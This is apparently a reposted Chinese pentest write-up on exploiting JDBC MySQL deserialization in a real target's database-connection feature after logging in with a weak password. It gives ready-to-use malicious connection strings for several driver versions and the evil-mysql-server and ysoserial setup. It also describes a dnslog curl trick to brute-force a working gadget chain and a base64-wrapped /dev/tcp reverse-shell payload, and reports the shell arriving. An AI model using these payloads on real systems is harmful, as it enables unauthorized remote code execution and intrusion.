JDBC反序列化实战

项目中遇到一个JDBC反序列化的点，和同学交流之后也是拿下了这个点，记录一下也是对这个加深一下印象。

至于什么是JDBC反序列化可以自行去了解，该文章只是提供一下打的思路。

获取一个弱口令进入后台：

看到了一个连接数据库的一个功能点，像实战中这种功能点都可以去尝试一下这个反序列化。

当时只知道可能会存在JDBC反序列化这么一个漏洞，但是自己没怎么打过，向同学了解之后，简单总结一下过程。

https://github.com/dushixiang/evil-mysql-server
https://github.com/frohoff/ysoserial

参考：

https://github.com/dushixiang/evil-mysql-server/blob/master/README-zh_CN.md

./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-all.jar

常用的payload如下：

5.1.11-5.x

jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe

6.x

jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe

8.x

jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe

这里解释一下username什么意思：

如图解释：yso_CommonsCollections1_calc.exe是选择CommonsCollections1这条链执行calc命令

这里随便选择一个payload打过去：注意这里username单独写，密码随意。

可以看到mysql版本为8.x，这样就能确定mysql版本了：

前面确定mysql版本之后，要确定可打的链子是哪一条，这里同学也是给了一个思路，将ysoserial里面的payload作为一个字典，利用burp爆破，假设cc1可用，那么payload为：yso_CommonsCollections1_curl `echo CommonsCollections1`.objxwd.dnslog.cn，这样dnslog.cn就会回显CommonsCollections1字段，利用该思想对该链子进行爆破：

如图，选择该处的两个位置同时进行爆破，将ysoserial的链子作为字典：

最后爆出了可用的链子为cc6：

这样mysql版本确定了，可用链子也确定了，接下来就是构造恶意的payload打过去就行了：

假设反弹地址为1.1.1.1:1234

反弹命令为：/bin/sh -i >& /dev/tcp/1.1.1.1/1234 0>&1

连接字符串:

jdbc:mysql://ip:端口/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true

username：

ysu_CommonsCollections6_bash -c {echo,反弹命令base64编码}|{base64,-d}|{bash,-i}

直接打过去：

这里成功收到会话

对于可能第一次了解到这个漏洞理解可能比较困难，但是这里也提供了一个可以利用的点，当遇到这种功能点时，至少是能想到有这么一个东西，具体可以自行去了解，了解完之后在理解这篇文章就很容易了，思路过程写的也很清晰，照着这个过程来就行了。

原文始发于微信公众号（哈拉少安全小队）：JDBC反序列化实战